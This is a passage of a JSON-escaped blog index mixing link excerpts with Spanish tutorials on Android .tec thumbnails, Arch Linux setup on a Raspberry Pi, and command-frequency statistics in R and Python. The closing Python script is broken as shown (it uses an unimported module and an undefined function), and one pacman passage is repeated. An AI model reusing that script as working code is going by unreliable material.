closures\u003c/li\u003e\n\u003cli\u003ewhat happens when you mix lexical scoping code and dynamic scoping\ncode\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eEmacs Lisp is always dynamically scoped in Emacs 23 and below. Support\nfor lexical scoping is added to Emacs 24. Nice because many agree that\nlexical scoping makes more sense in most cases than dynamic scoping\ndoes. You’ll see why soon in this article. If you have an el file that\nyou want to load with lexical scoping, you can add -*-\nlexical-binding: t -*- as the first line, then when Emacs 24 loads\nthe file, it will apply lexical scoping to the code in that el file.\u003c/p\u003e","title":"lexical scoping and dynamic scoping in Emacs Lisp"},{"content":" A few years ago I would answer the above question with ”because NULL is defined as a void pointer to 0”, which is only half correct (and close to being wrong). The answer to this question is much more complicated and thus much more interesting.\nLet’s start with checking what the C standards (or actually drafts of the standards) say about the (in)famous NULL ptr. The green/yellow/orange colors mark the part that caught my attention. I’ll leave the C++0x case for another time (C++0x introduces the nullptr of std::nullptr_t type btw). For TL;DR scroll down, I summarize the points anyway.\n» gynvael.coldwind.pl\n","permalink":"http://karpoke.ignaciocano.com/2012/06/26/why-null-points-to-0/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA few years ago I would answer the above question with ”because NULL\nis defined as a void pointer to 0”, which is only half correct (and\nclose to being wrong). The answer to this question is much more\ncomplicated and thus much more interesting.\u003c/p\u003e\n\u003cp\u003eLet’s start with checking what the C standards (or actually drafts of\nthe standards) say about the (in)famous NULL ptr. The\ngreen/yellow/orange colors mark the part that caught my attention.\nI’ll leave the C++0x case for another time (C++0x introduces the\nnullptr of std::nullptr_t type btw). For TL;DR scroll down, I\nsummarize the points anyway.\u003c/p\u003e","title":"Why NULL points to 0?"},{"content":" Buenas, aquí os traigo, en primicia, una guía que destripa los secretos del sistema de puntuación del juego, uno de los más complejos de la época y de la historia de los beat em up. Muchos os habreis acabado este juego, pero seguro que nunca habeis tenido claro porque la maquina os da al final una puntuacion u otra, incluso aunque hayais hecho partidas casi iguales la puntuacion cambia ostensiblemente y nunca queda claro el motivo. Bien, espero con esta breve guia quede todo claro y a partir de ahora controleis a vuestro antojo los puntos que obteneis en este juego. Al clarificar el sistema de puntuacion, tambien se hace mas sencillo intentar lograr una cierta puntuacion en el juego, pues ahora ya sabemos de qué depende. La guia está basada en la versión original, esto es, la versión Arcade japonesa. Es importante este detalle porque algunos enemigos tienen algo menos de vida en el resto de versiones arcade del juego. Y por supuesto esto que digo nada tiene que ver con la versiones domésticas.\nBasada en una guía original japonesa, he recortado varios apartados de la misma para no hacerla redundante ya que hay muchas cosas como los controles, etc\u0026hellip; que son de sobra conocidos por todos y no suponen ninguna novedad. Tambien he optado por no publicar los capitulos referentes a estrategias para acabar con los enemigos y hacer el maximo de puntuacion posible en el juego ya que considero que dichas estrategias a dia de hoy ya han sido superadas (aunque no publicadas).\n» @ZIDEVS | elotrolado.net\n","permalink":"http://karpoke.ignaciocano.com/2012/06/26/golden-axe-desvelando-todos-sus-secretos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eBuenas, aquí os traigo, en primicia, una guía que destripa los\nsecretos del sistema de puntuación del juego, uno de los más complejos\nde la época y de la historia de los beat em up. Muchos os habreis\nacabado este juego, pero seguro que nunca habeis tenido claro porque\nla maquina os da al final una puntuacion u otra, incluso aunque hayais\nhecho partidas casi iguales la puntuacion cambia ostensiblemente y\nnunca queda claro el motivo. Bien, espero con esta breve guia quede\ntodo claro y a partir de ahora controleis a vuestro antojo los puntos\nque obteneis en este juego. Al clarificar el sistema de puntuacion,\ntambien se hace mas sencillo intentar lograr una cierta puntuacion en\nel juego, pues ahora ya sabemos de qué depende. La guia está basada en\nla versión original, esto es, la versión Arcade japonesa. Es\nimportante este detalle porque algunos enemigos tienen algo menos de\nvida en el resto de versiones arcade del juego. Y por supuesto esto\nque digo nada tiene que ver con la versiones domésticas.\u003c/p\u003e","title":"Golden Axe - Desvelando todos sus secretos"},{"content":" We’ve covered PHP’s PDO API a couple of times here on Nettuts+, but, generally, those articles focused more on the theory, and less on the application. This article will fix that! To put it plainly, if you’re still using PHP’s old mysql API to connect to your databases, read on!\n» tutsplus.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/25/php-database-access-are-you-doing-it-correctly/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWe’ve covered PHP’s PDO API a couple of times here on Nettuts+, but,\ngenerally, those articles focused more on the theory, and less on the\napplication. This article will fix that!\nTo put it plainly, if you’re still using PHP’s old mysql API to\nconnect to your databases, read on!\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://net.tutsplus.com/tutorials/php/php-database-access-are-you-doing-it-correctly/\"\u003etutsplus.com\u003c/a\u003e\u003c/p\u003e","title":"PHP Database Access: Are You Doing It Correctly?"},{"content":" There are, roughly speaking, three ways to develop large user-facing programs, which we will refer to here as 0) the Unix way, 1) the Emacs way, and 2) the wrong way.\n» technomancy.us\n","permalink":"http://karpoke.ignaciocano.com/2012/06/25/in-which-three-programming-methods-are-compared/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThere are, roughly speaking, three ways to develop large user-facing\nprograms, which we will refer to here as 0) the Unix way, 1) the Emacs\nway, and 2) the wrong way.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://technomancy.us/161\"\u003etechnomancy.us\u003c/a\u003e\u003c/p\u003e","title":"in which three programming methods are compared"},{"content":" Lawrence Krauss da una charla sobre nuestro actual panorama del universo, cómo éste terminará y sobre todo cómo es que se produjo desde la nada. Krauss es autor de muchos libros best seller sobre física y cosmología, incluyendo ”Física de Star Trek.”\n» @polibioinexistente | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/25/un-universo-desde-la-nada/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLawrence Krauss da una charla sobre nuestro actual panorama del\nuniverso, cómo éste terminará y sobre todo cómo es que se produjo\ndesde la nada. Krauss es autor de muchos libros best seller sobre\nfísica y cosmología, incluyendo ”Física de Star Trek.”\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/Fs_MwYZHm7g?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» @polibioinexistente | \u003ca href=\"https://www.youtube.com/watch?v=Fs_MwYZHm7g\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"Un universo desde la nada"},{"content":" Nicola Tesla, ingeniero y matemático fue uno de los grandes inventores del siglo XX y también de los más olvidados. Precursor de la televisión, de la robótica, de los rayos X y de muchos otros adelantos, Tesla fue el genio que afirmó y demostró en sus experimentos que podía generar una energía libre, universal y gratuita. En 2006 las Naciones Unidas conmemoraron el año de Tesla. Además Tesla ha servido de inspiración para la Real Academia de Ciencias Exactas, Físicas y Matemáticas, que este año ha reivindicado su figura. Precisamente ahora, finaliza el ciclo ”Ciencia para todos” y con él, el proceso de selección de talentos matemáticos entre los escolares españoles. Es el llamado proyecto ESTALMAT, que sigue los pasos de las antiguas escuelas de conocimiento.\n» Tesla, el genio que hizo la luz\n","permalink":"http://karpoke.ignaciocano.com/2012/06/25/tesla-el-genio-que-hizo-la-luz/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNicola Tesla, ingeniero y matemático fue uno de los grandes inventores\ndel siglo XX y también de los más olvidados. Precursor de la\ntelevisión, de la robótica, de los rayos X y de muchos otros\nadelantos, Tesla fue el genio que afirmó y demostró en sus\nexperimentos que podía generar una energía libre, universal y\ngratuita. En 2006 las Naciones Unidas conmemoraron el año de Tesla.\nAdemás Tesla ha servido de inspiración para la Real Academia de\nCiencias Exactas, Físicas y Matemáticas, que este año ha reivindicado\nsu figura. Precisamente ahora, finaliza el ciclo ”Ciencia para todos”\ny con él, el proceso de selección de talentos matemáticos entre los\nescolares españoles. Es el llamado proyecto ESTALMAT, que sigue los\npasos de las antiguas escuelas de conocimiento.\u003c/p\u003e","title":"Tesla, el genio que hizo la luz"},{"content":" Maurits Cornelis Escher es un artista holandés nacido en la ciudad de Leeuwarden, Países Bajos, el 17 de junio de 1898, mejor conocido por sus grabados en madera, xilografías y litografías que tratan sobre figuras imposibles, teselados y mundos imaginarios. Su obra experimenta con diversos métodos de representar (en dibujos de 2 ó 3 dimensiones) espacios paradójicos que desafían a los modos habituales de representación. No fue precisamente un estudiante brillante, y sólo llegó a destacar en las clases de dibujo. En 1919, bajo presión paterna, empieza los estudios de arquitectura en la Escuela de Arquitectura y Artes Decorativas de Haarlem, estudios que abandonó poco después para pasar como discípulo de un profesor de artes gráficas, Jessurum de Mesquitas. Con él, adquirió unos buenos conocimientos básicos de dibujo, y destacó sobremanera en la técnica de grabado en madera, la cual llegó a dominar con gran maestría.\n» @stanchinsky | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2012/06/25/m-c-escher-metamorphose/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMaurits Cornelis Escher es un artista holandés nacido en la ciudad de\nLeeuwarden, Países Bajos, el 17 de junio de 1898, mejor conocido por\nsus grabados en madera, xilografías y litografías que tratan sobre\nfiguras imposibles, teselados y mundos imaginarios. Su obra\nexperimenta con diversos métodos de representar (en dibujos de 2 ó 3\ndimensiones) espacios paradójicos que desafían a los modos habituales\nde representación. No fue precisamente un estudiante brillante, y sólo\nllegó a destacar en las clases de dibujo. En 1919, bajo presión\npaterna, empieza los estudios de arquitectura en la Escuela de\nArquitectura y Artes Decorativas de Haarlem, estudios que abandonó\npoco después para pasar como discípulo de un profesor de artes\ngráficas, Jessurum de Mesquitas. Con él, adquirió unos buenos\nconocimientos básicos de dibujo, y destacó sobremanera en la técnica\nde grabado en madera, la cual llegó a dominar con gran maestría.\u003c/p\u003e","title":"M.C. Escher - Metamorphose"},{"content":"Haciendo una copia de seguridad de los datos de un móvil con Android ICS, he visto que existe un directorio llamado cache en el mismo directorio donde se guardan las fotos, /sdcard/DCIM/Camera, que contiene archivos cuya extensión es .tec.\nEchando un vistazo al contenido de estos archivos con hexer, parece ser que se trata de un archivo JFIF:\n00000000: ff d9 66 b3 00 00 ff d8 ff e0 00 10 4a 46 49 46 ..f.........JFIF 00000010: 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 .............C.. 00000020: 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 ................ Por el nombre del directorio y por el tamaño de las fotos, menos de 100K, parece que deben ser imágenes en miniatura.\nAunque no he encontrado ninguna aplicación que las pueda abrir directamente, he encontrado un vídeo donde se explica cómo abrirlas. La técnica consiste en eliminar los 6 primeros bytes y el último. Podemos confirmar que funciona con GHex, un editor hexadecimal para Gnome. He intentado eliminar los bytes con hexer pero no hay manera, siempre se me pone en \u0026ldquo;modo infierno\u0026rdquo; y no termina de salir bien.\nSi queremos recuperar todas esas imágenes en miniatura, hacer el cambio archivo a archivo es algo impensable, sobre todo si tenemos un gran número de ellas. Utilizando dd podemos conseguir eliminar los 6 primeros bytes de todas las imágenes:\n$ for f in *.tec; do dd bs=6 skip=1 if=$f of=$f.jfif done Aunque en este caso no eliminamos el último byte, los archivos creados se pueden abrir sin problemas.\nComo comentario final, si queremos borrar las fotos del móvil, deberíamos borrar también las imágenes en miniatura que están en el directorio /sdcard/DCIM/Camera/cache, o directamente el propio directorio.\nReferencias Recover deleted photos from an Android device\nBest way to remove bytes from the start of a file?\nJPEG File Interchange Format (JFIF)\n","permalink":"http://karpoke.ignaciocano.com/2012/06/23/abrir-archivos-tec-en-gnulinux/","summary":"\u003cp\u003eHaciendo una copia de seguridad de los datos de un móvil con Android\nICS, he visto que existe un directorio llamado \u003ccode\u003ecache\u003c/code\u003e en el mismo\ndirectorio donde se guardan las fotos, \u003ccode\u003e/sdcard/DCIM/Camera\u003c/code\u003e, que\ncontiene archivos cuya extensión es \u003ccode\u003e.tec\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eEchando un vistazo al contenido de estos archivos con \u003ccode\u003ehexer\u003c/code\u003e, parece\nser que se trata de un archivo JFIF:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e00000000:  ff d9 66 b3 00 00 ff d8  ff e0 00 10 4a 46 49 46  ..f.........JFIF\n00000010:  00 01 01 00 00 01 00 01  00 00 ff db 00 43 00 05  .............C..\n00000020:  03 04 04 04 03 05 04 04  04 05 05 05 06 07 0c 08  ................\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePor el nombre del directorio y por el tamaño de las fotos, menos de\n100K, parece que \u003ca href=\"http://androidforums.com/samsung-galaxy-s2-international/427146-dcim-camera-cache.html\"\u003edeben ser imágenes en miniatura\u003c/a\u003e.\u003c/p\u003e","title":"Abrir archivos .tec en GNU/Linux"},{"content":"Después de haber estado usando la Raspberry Pi con Debian, he querido probar otras distribuciones, en este caso Arch.\nDesde la página de descargas, nos bajamos el torrent, así no sobrecargamos el servidor.\nCrear una copia de la tarjeta SD He estado unos días trasteando con Debian, ya sabéis, modificando la tabla de particiones para utilizar todo el espacio disponible, instalando paquetes, configurándola a mi gusto, no mucho, pero si ahora formateo la tarjeta, es un trabajo perdido. No sólo eso, sino que no descarto tener que repetirlo de nuevo si posteriormente vuelvo a debian. Puede que al final me quede con Arch, pero me apetece probar alguna distribución más, como Raspbmc o PwnPi, así que me interesa guardar una copia de la tarjeta. Quizá sería mejor opción crear una máquina virtual con qemu para probar otras distribuciones, o utilizar tarjetas SD diferentes, pero dado lo sencillo que es hacer la copia esto será lo primero que haga.\nPara crear una copia de la tarjeta, nos aseguramos de que está desmontada y ejecutamos:\n$ dd bs=1M if=/dev/mmcblk0 of=my-debian-19-04-2012.img Comprimiremos la imagen utilizando pbzip2:\n$ pbzip2 my-debian-19-04-2012.img Sólo para hacer la copia y comprimir la imagen tarda un rato, dependiendo de la tarjeta SD y del procesador que tengamos. En mi caso, una tarjeta SD Samsung Class 10 y con un Core 2 Duo todo el proceso ha tardado algo menos de media hora (un cuarto de hora copiar la imagen y unos diez minutos comprimirla).\nCuando queramos volcar la imagen a la tarjeta, lo hacemos a la inversa. Primero, descomprimimos la imagen:\n$ pbzip2 -d my-debian-19-04-2012.img.bz2 Introducimos la tarjeta en el equipo y la desmontamos. En mi caso la tarjeta es el dispositivo /dev/mmcblk0. Lo podemos comprobar ejecutando:\n$ sudo fdisk -l Disco /dev/mmcblk0: 8068 MB, 8068792320 bytes 4 cabezas, 32 sectores/pista, 123120 cilindros, 15759360 sectores en total Unidades = sectores de 1 * 512 = 512 bytes Tamaño de sector (lógico / físico): 512 bytes / 512 bytes Tamaño E/S (mínimo/óptimo): 512 bytes / 512 bytes Identificador del disco: 0x000ee283 Dispositivo Inicio Comienzo Fin Bloques Id Sistema /dev/mmcblk0p1 2048 155647 76800 c W95 FAT32 (LBA) /dev/mmcblk0p2 157696 15368063 7605184 83 Linux /dev/mmcblk0p3 15368064 15759231 195584 82 Linux swap / Solaris En la salida del comando, sólo he puesto la parte referente a la tarjeta SD, por lo que antes de esto nos saldrá la información relativa al disco duro.\nY, por último, copiamos nuestra imagen a la tarjeta SD, tal como hicimos la primera vez:\n$ dd bs=1M if=my-debian-19-04-2012.img of=/dev/mmcblk0 Listo, ya la podemos introducir en la Raspberry Pi y encenderla.\nInstalando Arch Una vez que nos hemos bajado la imagen de Arch y que podemos sobreescribir el contenido de la tarjeta SD sin remordimientos, vamos a instalar Arch. Primero, comprobamos que el archivo descargado es correcto:\n$ sha1sum archlinuxarm-29-04-2012.zip b84d1eaba2ec64982da40ccd7dba06b186f69545 archlinuxarm-29-04-2012.zip Lo descomprimimos:\n$ unzip archlinuxarm-29-04-2012.zip Comprobamos que la imagen se ha descomprimido correctamente:\n$ cd archlinuxarm-29-04-2012/ $ cat archlinuxarm-29-04-2012.img.sha1 19034eb6808a248d30bda99450b03af1a88daf82 archlinuxarm-29-04-2012.img $ sha1sum archlinuxarm-29-04-2012.img 19034eb6808a248d30bda99450b03af1a88daf82 archlinuxarm-29-04-2012.img Y, ahora ya sí, volcamos la imagen a la tarjeta SD:\n$ dd bs=1M if=archlinuxarm-29-04-2012.img of=/dev/mmcblk0 Primera actualización Lo primero será actualizar el sistema. Esta chuleta del gestor de paquetes de Arch, pacman, nos vendrá bien si estamos acostumbrados a aptitude:\n[root@alarmpi ~]# pacman -Syu Esto nos advertirá de que hay una actualización del paquete pacman y que si queremos actualizar éste primero.\n:: The following packages should be upgraded first : pacman es :: Do you want to cancel the current operation :: and upgrade these packages now? [Y/n] n Por ahora le diremos que no, ya que nos puede evitar algunos problemas. A continuación realizará la actualización del sistema:\n:: Starting full system upgrade... :: Replace libusb with core/libusbx? [Y/n] :: Replace procps with core/procps-ng? [Y/n] :: Replace udev with core/systemd-tools? [Y/n] resolving dependencies... looking for inter-conflicts...Lo primero será actualizar el sistema. Esta chuleta del gestor de paquetes de Arch, pacman, nos vendrá bien si estamos acostumbrados a aptitude: [root@alarmpi ~]# pacman -Syu Esto nos advertirá de que hay una actualización del paquete pacman y que si queremos actualizar éste primero.\n:: The following packages should be upgraded first : pacman es :: Do you want to cancel the current operation :: and upgrade these packages now? [Y/n] n Por ahora le diremos que no, ya que nos puede evitar algunos problemas. A continuación realizará la actualización del sistema:\n:: Starting full system upgrade... :: Replace libusb with core/libusbx? [Y/n] :: Replace procps with core/procps-ng? [Y/n] :: Replace udev with core/systemd-tools? [Y/n] resolving dependencies... looking for inter-conflicts... error: failed to commit transaction (conflicting files) error: failed to commit transaction (conflicting files) filesystem: /var/lock exists in filesystem filesystem: /var/run exists in filesystem Errors occurred, no packages were upgraded. Por algún motivo, al actualizar se encontraron archivos que ya existían, y en lugar de sobre escribirlos, nos avisa y aborta la actualización. Lo que podemos hacer en este caso es comprobar si los archivos pertenecen a algún paquete mediante:\n[root@alarmpi ~]# pacman -Qo /var/lock error: No package owns /var/lock Si el archivo no pertenece a ningún paquete, lo renombraremos y volveremos a intentar actualizar. Si todo va bien, podemos borrar el archivo.\n[root@alarmpi ~]# mv /var/lock{,.bak} Usuarios, contraseñas, privilegios Tras arrancar la Raspberry Pi, lo primero que haremos será cambiar la contraseña de root:\n[root@alarmpi ~]# passwd root La cuenta de root sólo se debería utilizar para tareas de administración, por lo que crearemos un nuevo usuario para uso cotidiano:\n[root@alarmpi ~]# useradd -m -g users -G audio,lp,optical,storage,video,wheel,games,power,scanner -s /bin/bash archie Si queremos utilizar sudo, para evitar tener que iniciar sesión como root, primero tenemos que instalarlo:\n[root@alarmpi ~]# pacman -S sudo Una vez instalado, editaremos el fichero /etc/sudoers mediante el comando visudo. ES IMPORTANTE utilizar visudo y no otro editor, porque un error podría dejar la cuenta de root inaccesible.\n[root@alarmpi ~]# visudo Al crear nuestro usuario, lo hemos añadido al grupo wheels, que será el que utilicemos para permitir el uso de sudo, por lo que buscamos la siguete linea y la descomentamos:\n%wheel ALL=(ALL) ALL Para añadir autocompletado a sudo, editamos el fichero ~/.bashrc y añadimos:\ncomplete -cf sudo Si la cuenta que hemos creado puede utilizar sudo, podemos deshabilitar la cuenta de root, aunque ya nos advierten de que esto podría causar algún problema. Para deshabilitarla:\n[myusername@alarmpi ~]$ sudo passwd -l root passwd: password expiry information changed. Si queremos volver a habilitarla:\n[myusername@alarmpi ~]$ sudo passwd -u root Instalando algunos paquetes Nada más conectarme por SSH, echo en falta algunos paquetes, aunque es algo que tiene fácil y rápida solución:\n[myusername@alarmpi ~]$ sudo pacman -S htop vim byobu es como screen pero mejor, aunque no se encuentra en los repositorios oficiales, sí está en los de usuario, AUR. Si queremos instalarlo:\n[myusername@alarmpi ~]$ cd /tmp [myusername@alarmpi ~]$ wget http://aur.archlinux.org/packages/by/byobu/byobu.tar.gz [myusername@alarmpi ~]$ tar zxf byobu.tar.gz [myusername@alarmpi ~]$ cd byobu [myusername@alarmpi ~]$ makepkg Si falta alguna dependencia, nos lo hará saber. En este caso, instalé las siguientes:\n[myusername@alarmpi ~]$ sudo pacman -S fakeroot tmux libnewt python2 patch make Una vez satisfechas las dependencias, creamos el paquete y lo instalamos:\n[myusername@alarmpi ~]$ makepkg [myusername@alarmpi ~]$ sudo pacman -U *.xz Si queremos tener la hora del sistema actualizada de forma automática, instalamos el paquete openntpd:\n[myusername@alarmpi ~]$ sudo pacman -S openntpd Y editamos el fichero /etc/rc.conf para comprobar que se ejecuta la sincronización de openntpd al inicio y que el servicio hwclock está bloqueado (tiene una exclamación delante de su nombre):\n# al final del fichero... DAEMONS=(!hwclock syslog-ng network openntpd @netfs @crond @sshd) hostname e IP estática Si queremos cambiar el hostname editamos el fichero /etc/rc.conf y modificamos el valor de la variable HOSTNAME.\nPara cambiar la configuración de red y asignarle una IP estática, en el mismo fichero /etc/rc.conf y añadimos nuestra configuración en la sección correspondiente:\ninterface=eth0 address=192.168.1.51 netmask=255.255.255.0 broadcast=192.168.1.255 gateway=192.168.1.1 Reiniciamos el servicio:\n[myusername@alarmpi ~]$ sudo /etc/rc.d/network restart Si estábamos conectados por SSH, se cerrará la conexión y tendremos que volver a conectarnos, entonces nos aparecerá una alerta diciéndonos que la identificación del equipo remoto ha cambiado. Para solucionarlo, ejecutamos:\n$ ssh-keygen -f \u0026#34;~/.ssh/known_hosts\u0026#34; -R 192.168.1.51 Entorno gráfico Si queremos instalar LXDE para tener un entorno gráfico:\n[myusername@alarmpi ~]$ sudo pacman -S lxde xorg-xinit xf86-video-fbdev Lo iniciamos:\n[myusername@alarmpi ~]$ xinit /usr/bin/lxsession Referencias » Raspberry Pi » Beginners’ Guide » Arch Linux Arm: First steps » pacman: gestor de paquetes de Arch » Arch Linux ARM: Raspberry Pi Forum\n","permalink":"http://karpoke.ignaciocano.com/2012/06/22/arch-en-raspberry-pi/","summary":"\u003cp\u003eDespués de haber estado usando la \u003ca href=\"/2012/06/21/raspberry-pi/\"\u003eRaspberry Pi con Debian\u003c/a\u003e, he\nquerido probar otras distribuciones, en este caso Arch.\u003c/p\u003e\n\u003cp\u003eDesde la página de \u003ca href=\"http://www.raspberrypi.org/downloads\"\u003edescargas\u003c/a\u003e, nos bajamos el torrent, así no\nsobrecargamos el servidor.\u003c/p\u003e\n\u003ch2 id=\"crear-una-copia-de-la-tarjeta-sd\"\u003eCrear una copia de la tarjeta SD\u003c/h2\u003e\n\u003cp\u003eHe estado unos días trasteando con Debian, ya sabéis, modificando la\ntabla de particiones para utilizar todo el espacio disponible,\ninstalando paquetes, configurándola a mi gusto, no mucho, pero si ahora\nformateo la tarjeta, es un trabajo perdido. No sólo eso, sino que no\ndescarto tener que repetirlo de nuevo si posteriormente vuelvo a debian.\nPuede que al final me quede con Arch, pero me apetece probar alguna\ndistribución más, como \u003ca href=\"http://www.raspbmc.com\"\u003eRaspbmc\u003c/a\u003e o \u003ca href=\"http://www.pwnpi.com\"\u003ePwnPi\u003c/a\u003e, así que me interesa\nguardar una copia de la tarjeta. Quizá sería mejor opción crear una\nmáquina virtual con \u003ccode\u003eqemu\u003c/code\u003e para probar otras distribuciones, o utilizar\ntarjetas SD diferentes, pero dado lo sencillo que es hacer la copia esto\nserá lo primero que haga.\u003c/p\u003e","title":"Arch en Raspberry Pi"},{"content":" This is an introductory overview post for the Linux Graphics Stack, and how it currently all fits together. I initially wrote it for myself after having conversations with people like Owen Taylor, Ray Strode and Adam Jackson about this stack. I had to go back to them every month or so and learn the stuff from the ground up all over again, as I had forgotten every single piece. I asked them for a good high-level overview document so I could stop bothering them. They didn’t know of any. I started this one. It has been reviewed by Adam Jackson and David Airlie, both of whom work on this exact stack.\n» mecheye.net\n","permalink":"http://karpoke.ignaciocano.com/2012/06/22/the-linux-graphics-stack/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis is an introductory overview post for the Linux Graphics Stack,\nand how it currently all fits together. I initially wrote it for\nmyself after having conversations with people like Owen Taylor, Ray\nStrode and Adam Jackson about this stack. I had to go back to them\nevery month or so and learn the stuff from the ground up all over\nagain, as I had forgotten every single piece. I asked them for a good\nhigh-level overview document so I could stop bothering them. They\ndidn’t know of any. I started this one. It has been reviewed by Adam\nJackson and David Airlie, both of whom work on this exact stack.\u003c/p\u003e","title":"The Linux Graphics Stack"},{"content":"Distribución de los comandos más utilizados Una de esas combinaciones de comandos curiosas es aquella que nos devuelve un listado de los comandos más utilizados ordenados por frecuencia, en este caso limitado a los más frecuentes:\n$ history | awk \u0026#39;{a[$2]++} END {for (i in a) { print a[i] \u0026#34; \u0026#34; i }}\u0026#39; | sort -rn | head 62 cd 50 sudo 45 vim 39 ls 32 ssh 25 wget 23 memento.sh 23 cat 9 curl 9 man A partir de estos datos, podemos obtener una distribución de su frecuencia de uso en relación al número total de comandos diferentes utilizando el paquete estadístico R:\n$ history | awk \u0026#39;{a[$2]++}END{for(i in a){print a[i] \u0026#34; \u0026#34; i}}\u0026#39; | sort -rn \u0026gt; cmd_hist.txt $ R --no-save \u0026lt;\u0026lt; EOF jpeg(\u0026#39;cmd_hist.jpg\u0026#39;) cmd\u0026lt;-read.table(\u0026#39;cmd_hist.txt\u0026#39;) par(cex=1.2) plot(log(1:length(cmd[,1])),log(cmd[,1]), pch=20, xlab=\u0026#39;log(Rank)\u0026#39;, ylab=\u0026#39;log(frequency)\u0026#39;) fit\u0026lt;-lm(log(cmd[,1])~log(1:length(cmd[,1]))) abline(fit,lty=2) EOF Esta es la imagen resultante:\nSe cumple que un reducido número de comandos se repiten la mayoría de las veces.\nEn particular, aunque el historial en este caso contiene 500 entradas, para los comandos más utilizados sólo se han utilizado unos 90 comandos diferentes:\n$ echo $HISTSIZE 500 $ history | wc -l 500 $ history | awk \u0026#39;{a[$2]++}END{for(i in a){print a[i] \u0026#34; \u0026#34; i}}\u0026#39; | sort -rn | wc -l 87 La diferencia estriba en que hay comandos que se utilizan repetidamente pero con diferentes argumentos.\nDistribución de la longitud del nombre de los comandos De la misma manera que se calcula la distribución de la frecuencia de los comandos más utilizados, podemos calcular la distribución de la longitud de los comandos disponibles.\nSi estamos en el terminal, en una línea nueva, sin haber escrito nada, y pulsamos dos veces el tabulador (ejecutamos el autocompletado), nos preguntara si queremos mostrar todas las posibilidades. Algo así:\n$ [TAB][TAB] Display all 6472 possibilities? (y or n) Estas posibilidades son cada uno de los programas incluidos en el path del sistema, así como comandos propios del shell o alias que hayamos definido. Si nos fijamos únicamente en los programas a lo que se puede acceder desde el path:\n$ for p in $(sed \u0026#39;s/:/\\n/g\u0026#39; \u0026lt;\u0026lt;\u0026lt; $PATH); do for cmd in $(find $p -maxdepth 1 -executable -printf \u0026#39;%p\\n\u0026#39;); do # remove prefix cmd=${cmd##*/} echo \u0026#34;${#cmd} $cmd\u0026#34; done done | sort -rn \u0026gt; cmd_len.txt $ wc -l cmd_len.txt 5838 cmd_len.txt Si queremos obtener la distribución de la longitud de sus nombres, podemos ejecutar:\n$ R --no-save \u0026lt;\u0026lt; EOF jpeg(\u0026#39;cmd_len.jpg\u0026#39;) cmd\u0026lt;-read.table(\u0026#39;cmd_len.txt\u0026#39;) par(cex=1.2) plot(log(1:length(cmd[,1])),log(cmd[,1]), pch=20, xlab=\u0026#39;log(length)\u0026#39;, ylab=\u0026#39;log(frequency)\u0026#39;) fit\u0026lt;-lm(log(cmd[,1])~log(1:length(cmd[,1]))) abline(fit,lty=2) EOF Este es el resultado:\nAquí la pendiente de la curva no es tan acusada, es decir, aunque la mayoría de los comandos tienen nombres cortos y la frecuencia decrece a medida que aumenta la longitud, esta variación se produce de forma paulatina hasta el final, donde ya sí cae en picado. Esto no ocurre con los lenguajes humanos, por lo que debe haber una explicación; y quizá tenga que ver con el autocompletado. Gracias a éste, no importa tanto la longitud de un comando sino el número de pulsaciones necesarias para poder identificarlo de forma única y poder así completar su nombre con una pulsación de tabulador. También hay otros comandos que serán ejecutados mediante un click de ratón. Por esto, podría ser que se priorice claridad y legibilidad sobre longitud en los nombres de los comandos.\nDistribución de palabras Tras haber visto la distribución de la frecuencia de los comandos más utilizados y la distribución de la frecuencia de la longitud de los comandos disponibles, podemos calcular la distribución de la frecuencia de las palabras de un texto.\nEl texto que voy a utilizar es la Advanced Bash-Scripting Guide.\n$ lynx -dump http://tldp.org/LDP/abs/html/abs-guide.html \u0026gt; abs-guide.txt Separaremos las palabras del texto, convertiremos las palabras a minúsculas, eliminaremos los signos de puntuación, las ordenaremos y las contaremos con el siguiente script en Python, word-frequency.py:\n#!/usr/bin/env python # encoding: utf-8 import re import sys from string import punctuation def main(filename): word_freq = {} word_list = [] try: # After the statement is executed, the file f is always closed, # even if a problem was encountered while processing the lines. with open(filename) as f: word_list = re.split(\u0026#39;\\s+\u0026#39;, file(filename).read().lower()) except IOError as e: print \u0026#34;I/O error({0}): {1}\u0026#34;.format(e.errno, e.strerror) except: print \u0026#34;Unexpected error:\u0026#34;, sys.exc_info()[0] raise for word in word_list: word = word.translate(None, string.punctuation) if len(word): word_freq[word] = word_freq.get(word,0) + 1 freq_list = [(val, key) for key, val in word_freq.items()] freq_list.sort(reverse=True) for freq, word in reverse(freq_list): print freq, word def usage(): print \u0026#34;Usage:\u0026#34;, sys.argv[0], \u0026#34; \u0026#34; if __name__ == \u0026#34;__main__\u0026#34;: if len(sys.argv) \u0026lt; 2: usage() else: main(sys.argv[1]) Creamos el archivo con el número de apariciones de cada palabra:\n$ python word-frequency.py abs-guide.txt 